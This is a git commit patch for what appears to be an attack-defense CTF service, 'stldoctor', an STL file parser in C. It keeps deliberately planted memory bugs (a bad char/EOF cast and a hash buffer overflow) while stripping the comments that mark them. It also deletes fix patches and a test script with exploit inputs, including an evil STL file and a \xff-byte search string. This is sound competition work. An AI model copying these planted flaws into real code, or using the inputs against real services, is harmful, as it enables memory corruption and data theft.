From 13b65f01132c41be9ab8d9f92c2c5ca605c366d8 Mon Sep 17 00:00:00 2001 From: Louis Burda Date: Sat, 29 May 2021 14:24:31 +0200 Subject: changed repo structure and commited releease files such that default docker-compose worklow commands work in testvm --- service/.dockerignore | 1 - service/.gitignore | 5 +- service/Dockerfile | 22 ++++ service/cleaner.sh | 24 +++++ service/container/.gitignore | 2 - service/container/Dockerfile | 22 ---- service/container/cleaner.sh | 24 ----- service/container/data/lastclean | 0 service/container/docker-compose.yml | 8 -- service/container/entrypoint.sh | 13 --- service/do.sh | 90 ---------------- service/docker-compose.yml | 8 ++ service/entrypoint.sh | 13 +++ service/src/.gitignore | 4 - service/src/Makefile | 1 - service/src/main.c | 27 +++-- service/src/patches/flagstore1.diff | 17 --- service/src/patches/flagstore2.diff | 11 -- service/src/stlfile.c | 9 +- service/src/stlfile.h | 2 +- service/src/util.c | 8 +- service/src/util.h | 2 +- service/tests/data/evil1.stl | 9 -- service/tests/data/flag1.stl | 16 --- service/tests/data/sample-ascii.stl | 16 --- service/tests/data/sample-binary.stl | Bin 134 -> 0 bytes service/tests/test.sh | 200 ----------------------------------- 27 files changed, 88 insertions(+), 466 deletions(-) delete mode 100644 service/.dockerignore create mode 100644 service/Dockerfile create mode 100644 service/cleaner.sh delete mode 100644 service/container/.gitignore delete mode 100644 service/container/Dockerfile delete mode 100644 service/container/cleaner.sh delete mode 100644 service/container/data/lastclean delete mode 100644 service/container/docker-compose.yml delete mode 100755 service/container/entrypoint.sh delete mode 100644 service/do.sh create mode 100644 service/docker-compose.yml create mode 100755 service/entrypoint.sh delete mode 100644 service/src/.gitignore delete mode 100644 service/src/patches/flagstore1.diff delete mode 100644 service/src/patches/flagstore2.diff delete mode 100644 service/tests/data/evil1.stl delete mode 100644 service/tests/data/flag1.stl delete mode 100644 service/tests/data/sample-ascii.stl delete mode 100644 service/tests/data/sample-binary.stl delete mode 100644 service/tests/test.sh (limited to 'service') diff --git a/service/.dockerignore b/service/.dockerignore deleted file mode 100644 index 4baccb8..0000000 --- a/service/.dockerignore +++ /dev/null @@ -1 +0,0 @@ -patches diff --git a/service/.gitignore b/service/.gitignore index 5ca3e64..8fce603 100644 --- a/service/.gitignore +++ b/service/.gitignore @@ -1,4 +1 @@ -data/* -!data/.keep -.cleansrc -src/.safebuild +data/ diff --git a/service/Dockerfile b/service/Dockerfile new file mode 100644 index 0000000..c932e66 --- /dev/null +++ b/service/Dockerfile @@ -0,0 +1,22 @@ +FROM ubuntu:18.04 + +RUN apt update && apt install -y --no-install-recommends socat build-essential + +RUN addgroup --system service +RUN adduser --system --ingroup service --uid 1000 service + +COPY entrypoint.sh / +RUN chmod 755 /entrypoint.sh + +COPY cleaner.sh / +RUN chmod 755 /cleaner.sh + +COPY src/ /service/ + +WORKDIR /service/ +RUN make clean && make + +EXPOSE 9000 +ENV RESULTDIR=/data/uploads + +ENTRYPOINT ["/entrypoint.sh"] diff --git a/service/cleaner.sh b/service/cleaner.sh new file mode 100644 index 0000000..bd67705 --- /dev/null +++ b/service/cleaner.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +timeref="/data/lastclean" + +if [ -z "$RESULTDIR" ]; then + echo "RESULTDIR is undefined! skipping cleanup.." + exit 1 +fi + +if [ -f "$timeref" ]; then + files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")" + echo "$files" | while read path; do + rm -rf "$path" + done + if [ -z "$files" ]; then + filecount=0 + else + filecount=$(echo "$files" | wc -l) + fi + echo "[ $(date +%T) ] Removed $filecount old files!" +fi + +touch "$timeref" + diff --git a/service/container/.gitignore b/service/container/.gitignore deleted file mode 100644 index 8156e3e..0000000 --- a/service/container/.gitignore +++ /dev/null @@ -1,2 +0,0 @@ -src/ -data/ diff --git a/service/container/Dockerfile b/service/container/Dockerfile deleted file mode 100644 index c932e66..0000000 --- a/service/container/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -FROM ubuntu:18.04 - -RUN apt update && apt install -y --no-install-recommends socat build-essential - -RUN addgroup --system service -RUN adduser --system --ingroup service --uid 1000 service - -COPY entrypoint.sh / -RUN chmod 755 /entrypoint.sh - -COPY cleaner.sh / -RUN chmod 755 /cleaner.sh - -COPY src/ /service/ - -WORKDIR /service/ -RUN make clean && make - -EXPOSE 9000 -ENV RESULTDIR=/data/uploads - -ENTRYPOINT ["/entrypoint.sh"] diff --git a/service/container/cleaner.sh b/service/container/cleaner.sh deleted file mode 100644 index bd67705..0000000 --- a/service/container/cleaner.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/bin/sh - -timeref="/data/lastclean" - -if [ -z "$RESULTDIR" ]; then - echo "RESULTDIR is undefined! skipping cleanup.." - exit 1 -fi - -if [ -f "$timeref" ]; then - files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")" - echo "$files" | while read path; do - rm -rf "$path" - done - if [ -z "$files" ]; then - filecount=0 - else - filecount=$(echo "$files" | wc -l) - fi - echo "[ $(date +%T) ] Removed $filecount old files!" -fi - -touch "$timeref" - diff --git a/service/container/data/lastclean b/service/container/data/lastclean deleted file mode 100644 index e69de29..0000000 diff --git a/service/container/docker-compose.yml b/service/container/docker-compose.yml deleted file mode 100644 index 1da888f..0000000 --- a/service/container/docker-compose.yml +++ /dev/null @@ -1,8 +0,0 @@ -version: '3' -services: - printdoc: - build: . - volumes: - - ./data/:/data:rw - ports: - - 9090:9000 diff --git a/service/container/entrypoint.sh b/service/container/entrypoint.sh deleted file mode 100755 index b7b6509..0000000 --- a/service/container/entrypoint.sh +++ /dev/null @@ -1,13 +0,0 @@ -#!/bin/sh - -mkdir -p "$RESULTDIR" -chown -R service:service "$RESULTDIR" - -while [ 1 ]; do - /cleaner.sh - sleep 200 -done & - -servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/build/stldoctor",raw,pty,echo=0,stderr' - -su -s /bin/sh -c "$servicecmd" service diff --git a/service/do.sh b/service/do.sh deleted file mode 100644 index d0ac5ed..0000000 --- a/service/do.sh +++ /dev/null @@ -1,90 +0,0 @@ -#!/bin/sh - -SCRIPTPATH="$(dirname $(readlink -f "$0"))" -cd "$SCRIPTPATH" - -makefile=" -all: .cleansrc - -.cleansrc: src/* - bash do.sh cleansrc src container/src - touch .cleansrc -" - -shopt -s expand_aliases -alias pushd="pushd &>/dev/null" -alias popd="popd &>/dev/null" - -if [ "$1" == "compose" ]; then - # ensure container files are up to date - make --file <(echo "$makefile") - - # forward commands to compose - pushd container - docker-compose ${@:2} - popd -elif [ "$1" == "cleansrc" ]; then - if [ $# -lt 3 ]; then - echo "USAGE: do.sh cleansrc " - exit 0 - fi - - # copy files - src="$2" - dst="$3" - [ -e "$dst" ] && rm -rf "$dst" - mkdir -p "$dst" - cp -r "$src"/{*.c,*.h,Makefile,msgs} "$dst" - - # strip comments - find "$dst" | while read path; do - if [ -f "$path" ]; then - if [ ! -z $(echo "$path" | grep '.[hc]$') ]; then - sed -i -e 's/^\s*\/\*.*\*\/\s*$//g' "$path" # remove /* */ style comments - sed -i -e 's/\s*\/\*.*\*\/\s*/ /g' "$path" # remove /* */ style comments - sed -i -e 's/\/\/.*//g' "$path" # remove // style comments - sed -i -e ':a;N;$!ba;s/\n\{3,\}/\n\n/g' "$path" # collapse multiple newlines - sed -i -e 's/fprintf(\s*stderr\s*,\s*/printf(/g' "$path" # replace fprintf stderr - elif [ "$(basename "$path")" == "Makefile" ]; then - sed -i -e 's/\s*#.*//g' "$path" # remove # style comments - sed -i -e ':a;N;$!ba;s/\n\{3,\}/\n\n/g' "$path" # collapse multiple newlines - fi - fi - done -elif [ "$1" == "test" ]; then - SRCDIR="$PWD/src" DATADIR="$PWD/container/data" bash "tests/test.sh" ${@:2} -elif [ "$1" == "make" ]; then - # build a normal version - pushd src - if [ -e ".safebuild" ]; then - make clean - rm ".safebuild" - fi - make - popd -elif [ "$1" == "make-safe" ]; then - # build a 'safe' version with flagstore patches - - pushd src - make clean - touch ".safebuild" - - for f in $(ls | grep '\.[ch]$'); do - cp "$f" "safe_$f" - done - - git apply patches/flagstore1.diff - git apply patches/flagstore2.diff - - PREFIX="safe_" make - - rm safe_* - popd -else - echo "USAGE: do.sh (compose) [args..]" - echo "EXAMPLES:" - echo " do.sh compose up --build # starts the docker container" - echo " do.sh cleansrc # post-process source files for release" - echo " do.sh make-safe # create patched version of binary" - echo " do.sh test # run a test on the binary" -fi diff --git a/service/docker-compose.yml b/service/docker-compose.yml new file mode 100644 index 0000000..1da888f --- /dev/null +++ b/service/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + printdoc: + build: . + volumes: + - ./data/:/data:rw + ports: + - 9090:9000 diff --git a/service/entrypoint.sh b/service/entrypoint.sh new file mode 100755 index 0000000..b7b6509 --- /dev/null +++ b/service/entrypoint.sh @@ -0,0 +1,13 @@ +#!/bin/sh + +mkdir -p "$RESULTDIR" +chown -R service:service "$RESULTDIR" + +while [ 1 ]; do + /cleaner.sh + sleep 200 +done & + +servicecmd='socat -T30 -s TCP-LISTEN:9000,reuseaddr,fork EXEC:"/service/build/stldoctor",raw,pty,echo=0,stderr' + +su -s /bin/sh -c "$servicecmd" service diff --git a/service/src/.gitignore b/service/src/.gitignore deleted file mode 100644 index 5f14e4d..0000000 --- a/service/src/.gitignore +++ /dev/null @@ -1,4 +0,0 @@ -stldoctor -*.o -vgcore.* -safe_* diff --git a/service/src/Makefile b/service/src/Makefile index d7732b3..2fee8c4 100644 --- a/service/src/Makefile +++ b/service/src/Makefile @@ -1,6 +1,5 @@ CFLAGS = -g -I . -# fortify source code CFLAGS += -fPIE -fstack-protector-strong -D_FORTIFY_SOURCE=2 -O2 LDFLAGS = -Wl,-z,now -Wl,-z,relro diff --git a/service/src/main.c b/service/src/main.c index de2bd48..d76ceb8 100644 --- a/service/src/main.c +++ b/service/src/main.c @@ -144,21 +144,21 @@ upload_cmd(const char *arg) bufp = ask("How large is your file? "); len = strtoul(bufp, &end, 10); if (len <= 0 || len >= MAXFILESIZE || *end) { - fprintf(stderr, "Invalid file length!\n"); + printf("Invalid file length!\n"); return; } printf("Ok! Im listening..\n"); contents = checkp(malloc(len + 1)); if (fread(contents, 1, len, stdin) != len) { - fprintf(stderr, "Hm, I'm missing some bytes.. try again!\n"); + printf("Hm, I'm missing some bytes.. try again!\n"); goto cleanup; } contents[len] = '\0'; if ((cached.valid = parse_file(&cached, contents, len))) { if (save_submission(&cached, contents, len) != OK) - fprintf(stderr, "Failed to save your submission!\n"); + printf("Failed to save your submission!\n"); else printf("Your file was saved with ID %s!\n", cached.hash); } @@ -180,7 +180,7 @@ search_cmd(const char *arg) if (arg && !strcmp(arg, "last")) { if (!cached.valid) { - fprintf(stderr, "No cached info report available\n"); + printf("No cached info report available\n"); return; } hash = cached.hash; @@ -201,12 +201,12 @@ search_cmd(const char *arg) } if (i == 0) { - fprintf(stderr, "Sorry, couldnt find a matching scan result!\n"); + printf("Sorry, couldnt find a matching scan result!\n"); goto cleanup; } else { which = strtoul(ask("Which of these results? "), &end, 10); if (which >= i || which < 0 || *end) { - fprintf(stderr, "Invalid index!\n"); + printf("Invalid index!\n"); goto cleanup; } } @@ -224,9 +224,8 @@ search_cmd(const char *arg) } } - /* file got cleaned up during race condition by background task */ if (!scandir) { - fprintf(stderr, "Selected result spontaneously combusted!\n"); + printf("Selected result spontaneously combusted!\n"); goto cleanup; } @@ -271,7 +270,7 @@ list_cmd(const char *arg) DIR *d; if (!loggedin) { - fprintf(stderr, "Not logged in!\n"); + printf("Not logged in!\n"); return; } @@ -283,7 +282,7 @@ list_cmd(const char *arg) path = aprintf("%s/%s/info", resultdir, de->d_name); if ((f = fopen(path, "r"))) { if (load_info(&info, f) != OK) - fprintf(stderr, "Failed to read saved file info!\n"); + printf("Failed to read saved file info!\n"); else print_info(&info); fclose(f); @@ -301,7 +300,7 @@ auth_cmd(const char *arg) int ret; if (loggedin) { - fprintf(stderr, "Already logged in!\n"); + printf("Already logged in!\n"); return; } @@ -313,7 +312,7 @@ auth_cmd(const char *arg) } else if (ret && errno == EEXIST) { printf("Success!\nWelcome back!\n"); } else { - fprintf(stderr, "Auth failed!\n"); + printf("Auth failed!\n"); return; } @@ -339,7 +338,7 @@ main() int exit, i, cmdlen; if (!(resultdir = checkp(strdup(getenv("RESULTDIR"))))) { - fprintf(stderr, "RESULTDIR not defined\n"); + printf("RESULTDIR not defined\n"); return 1; } @@ -371,6 +370,6 @@ main() } if (i == ARRSIZE(commands) && strlen(cmd) != 0) - fprintf(stderr, "No such command!\n"); + printf("No such command!\n"); } } diff --git a/service/src/patches/flagstore1.diff b/service/src/patches/flagstore1.diff deleted file mode 100644 index f0f8d4a..0000000 --- a/service/src/patches/flagstore1.diff +++ /dev/null @@ -1,17 +0,0 @@ ---- a/service/src/safe_util.c -+++ b/service/src/safe_util.c -@@ -78,13 +78,12 @@ void - freadstr(FILE *f, char **dst) - { - size_t start, len, tmp; -- char c; - - /* VULN #1: BAD CAST */ - /* see documentation/README.md for more details */ - - start = ftell(f); -- for (len = 0; (c = fgetc(f)) != EOF && c; len++); -+ for (len = 0; fgetc(f) > 0; len++); - fseek(f, start, SEEK_SET); - - *dst = checkp(calloc(1, len + 1)); diff --git a/service/src/patches/flagstore2.diff b/service/src/patches/flagstore2.diff deleted file mode 100644 index b34a0c0..0000000 --- a/service/src/patches/flagstore2.diff +++ /dev/null @@ -1,11 +0,0 @@ ---- a/service/src/safe_util.c -+++ b/service/src/safe_util.c -@@ -58,7 +58,7 @@ mhash(const char *str, int len) - srand(v); - - for (bp = buf, i = 0; i < MHASHLEN / 2; i++) -- bp += sprintf(bp, "%02x", str[i % len] ^ (rand() % 256)); -+ bp += sprintf(bp, "%02x", (unsigned char) str[i % len] ^ (rand() % 256)); - - return buf; - } diff --git a/service/src/stlfile.c b/service/src/stlfile.c index 88fc430..7b37df4 100644 --- a/service/src/stlfile.c +++ b/service/src/stlfile.c @@ -98,7 +98,7 @@ consume_keyword(char **start) for (i = 0; i < ARRSIZE(kwmap); i++) { len = strlen(kwmap[i].str); if (!strncmp(kwmap[i].str, bp, len) && (!bp[len] || isws(bp[len]))) { - // printf("GOT: %s\n", kwmap[i].str); + *start = bp + len + (bp[len] ? 1 : 0); return kwmap[i].code; } @@ -108,7 +108,7 @@ consume_keyword(char **start) } #define PARSE_FAIL(...) \ - do { fprintf(stderr, "FORMAT ERR: " __VA_ARGS__); goto fail; } while (0) + do { printf("FORMAT ERR: " __VA_ARGS__); goto fail; } while (0) int parse_file_ascii(struct parseinfo *info, char *buf, size_t len) @@ -272,13 +272,12 @@ parse_file(struct parseinfo *info, char *buf, size_t len) if (info->valid) free_info(info); if (len < 7) { - fprintf(stderr, "File too small!\n"); + printf("File too small!\n"); return FAIL; } info->filesize = len; - /* check bin vs ascii with first keyword */ for (bp = buf; isws(*bp); bp++); status = !strncmp("solid", bp, 5) && isws(bp[5]) ? parse_file_ascii(info, buf, len) @@ -290,7 +289,7 @@ parse_file(struct parseinfo *info, char *buf, size_t len) if (!info->modelname) { resp = ask("Please enter your model name: "); if (strlen(resp) < 4) { - fprintf(stderr, "Model name is too short!\n"); + printf("Model name is too short!\n"); return FAIL; } info->modelname = checkp(strdup(resp)); diff --git a/service/src/stlfile.h b/service/src/stlfile.h index d321282..11b7f66 100644 --- a/service/src/stlfile.h +++ b/service/src/stlfile.h @@ -51,4 +51,4 @@ int load_info(struct parseinfo *info, FILE *f); void print_info(struct parseinfo *info); void free_info(struct parseinfo *info); -#endif /* STLFILE_H */ +#endif diff --git a/service/src/util.c b/service/src/util.c index ce22c4e..140d08b 100644 --- a/service/src/util.c +++ b/service/src/util.c @@ -13,7 +13,7 @@ die(const char *fmtstr, ...) va_list ap; va_start(ap, fmtstr); - vfprintf(stderr, fmtstr, ap); + vprintf(fmtstr, ap); va_end(ap); exit(EXIT_FAILURE); @@ -49,9 +49,6 @@ mhash(const char *str, int len) int i, k, v; char c, *bp; - /* VULN #2: BUFFER OVERFLOW */ - /* see documentation/README.md for more details */ - if (len == -1) len = strlen(str); for (v = 0, i = 0; i < len; i++) v += str[i]; @@ -80,9 +77,6 @@ freadstr(FILE *f, char **dst) size_t start, len, tmp; char c; - /* VULN #1: BAD CAST */ - /* see documentation/README.md for more details */ - start = ftell(f); for (len = 0; (c = fgetc(f)) != EOF && c; len++); fseek(f, start, SEEK_SET); diff --git a/service/src/util.h b/service/src/util.h index c0e9064..7b6eed0 100644 --- a/service/src/util.h +++ b/service/src/util.h @@ -35,4 +35,4 @@ float fle32toh(float v); extern int echo; -#endif /* UTIL_H */ +#endif diff --git a/service/tests/data/evil1.stl b/service/tests/data/evil1.stl deleted file mode 100644 index 706e9e2..0000000 --- a/service/tests/data/evil1.stl +++ /dev/null @@ -1,9 +0,0 @@ -solid test˙ -facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid diff --git a/service/tests/data/flag1.stl b/service/tests/data/flag1.stl deleted file mode 100644 index f2a3854..0000000 --- a/service/tests/data/flag1.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid ENO{TESTFLAG} - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid diff --git a/service/tests/data/sample-ascii.stl b/service/tests/data/sample-ascii.stl deleted file mode 100644 index e3c89ef..0000000 --- a/service/tests/data/sample-ascii.stl +++ /dev/null @@ -1,16 +0,0 @@ -solid test - facet normal 1.0 0 0 - outer loop - vertex 0 1 0 - vertex 0 1 1 - vertex 0 0 1 - endloop - endfacet - facet normal 0 0 1.0 - outer loop - vertex 1 0 0 - vertex 1 1 0 - vertex 0 1 0 - endloop - endfacet -endsolid test diff --git a/service/tests/data/sample-binary.stl b/service/tests/data/sample-binary.stl deleted file mode 100644 index 13c02e4..0000000 Binary files a/service/tests/data/sample-binary.stl and /dev/null differ diff --git a/service/tests/test.sh b/service/tests/test.sh deleted file mode 100644 index 4835024..0000000 --- a/service/tests/test.sh +++ /dev/null @@ -1,200 +0,0 @@ -#!/bin/sh - -set -e - -if [ -z "$SRCDIR" -o -z "$DATADIR" ]; then - echo "Missing either SRCDIR or DATADIR env vars" - exit 1 -fi - -export RESULTDIR="$DATADIR/uploads" -export ECHO_INPUT=1 - -SCRIPTPATH="$(dirname $(readlink -f "$0"))" -TESTDATA="$SCRIPTPATH/data" - -shopt -s expand_aliases -alias pushd="pushd &>/dev/null" -alias popd="popd &>/dev/null" - -pushd "$SRCDIR" - -announce() { - count=$(echo "$1" | wc -c) - python3 -c " -import math -s = '$1' -c = 80 -print() -print('#'*c) -print('#' + ' '*math.floor((c - len(s))/2-1) + s + ' '*math.ceil((c - len(s))/2-1) + '#') -print('#'*c) -print() - " -} - -checkleaks() { - valgrind --leak-check=full --show-leak-kinds=all ./build/stldoctor 2>&1 | tee /tmp/testlog - if [ -z "$(grep "no leaks are possible" /tmp/testlog)" ]; then - echo "Valgrind exited with errors!" - exit 1 - fi -} - -connect() { - if [ "$RUNTYPE" == "remote" ]; then - nc localhost 9090 - elif [ "$RUNTYPE" == "debug" ]; then - checkleaks - else - ./build/stldoctor - fi -} - -cleanuploads() { - [ ! -z "$RESULTDIR" ] && rm -rf "$RESULTDIR" - mkdir -p "$RESULTDIR" -} - -if [ "$1" == "stl-leaks" ]; then - cleanuploads - - announce "Testing ASCII STL Parsing" - ( - echo "echo" - echo "upload" - cat "$TESTDATA/sample-ascii.stl" | wc -c - cat "$TESTDATA/sample-ascii.stl" - echo "ASCII-testname" - ) | checkleaks - - announce "Testing BIN STL Parsing" - ( - echo "echo" - echo "upload" - cat "$TESTDATA/sample-binary.stl" | wc -c - cat "$TESTDATA/sample-binary.stl" - echo "BIN-testname" - ) | checkleaks - -elif [ "$1" == "stl-upload" ]; then - cleanuploads - - popd - file="$(realpath $2)" - if [ ! -e "$file" ]; then - echo "Supply a file to upload" - exit 1 - fi - pushd "$SRCDIR" - - name="${3:-samplefile}" - ( - echo "echo" - echo "upload" - cat "$file" | wc -c - cat "$file" - echo "$name" - ) | checkleaks - -elif [ "$1" == "vuln1" ]; then - cleanuploads - - announce "Testing Flagstore 1" - - echo -e "\n--- Uploading target STL ---\n" 1>&2 - ( - echo "echo" - echo "upload" - cat "$TESTDATA/flag1.stl" | wc -c - cat "$TESTDATA/flag1.stl" - echo "N0TaFL4G" - echo "exit" - ) | connect - - echo -e "\n--- Uploading evil STL ---\n" 1>&2 - ( - echo "echo" - echo "upload" - cat "$TESTDATA/evil1.stl" | wc -c - cat "$TESTDATA/evil1.stl" - echo "EV1L" - echo "exit" - ) | connect - - echo -e "\n--- Testing Exploit ---\n" 1>&2 - ( - echo "echo" - - # try index 0 - echo "search" - echo "EV1L" - echo "0" - echo "n" - - echo "search last" - echo "0" - echo "n" - - # try index 1 - echo "search" - echo -e "EV1L" - echo "0" - echo "n" - - echo "search last" - echo "1" - echo "n" - echo "exit" - ) | connect - -elif [ "$1" == "vuln2" ]; then - cleanuploads - - announce "Testing Flagstore 2" - - echo -e "\n--- Uploading target STL ---\n" 1>&2 - ( - echo "echo" - echo "auth test" - echo "upload" - cat "$TESTDATA/flag1.stl" | wc -c - cat "$TESTDATA/flag1.stl" - echo "N0TaFL4G" - echo "exit" - ) | connect - - echo -e "\n--- Testing Exploit ---\n" 1>&2 - ( - echo "echo" - echo -e "search \xff\xff\xff\xff\xff0000000000000000" - echo "auth" - echo "list" - echo "exit" - ) | connect - -elif [ "$1" == "auth-upload" ]; then - cleanuploads - - ( - echo "echo" - - echo "auth test" - echo "upload" - cat "$TESTDATA/sample-ascii.stl" | wc -c - cat "$TESTDATA/sample-ascii.stl" - echo "testname" - ) | connect - - ( - echo "echo" - - echo "auth test" - echo "list" - echo "search testname" - ) | connect -else - connect -fi - -popd -- cgit v1.2.3-71-gd317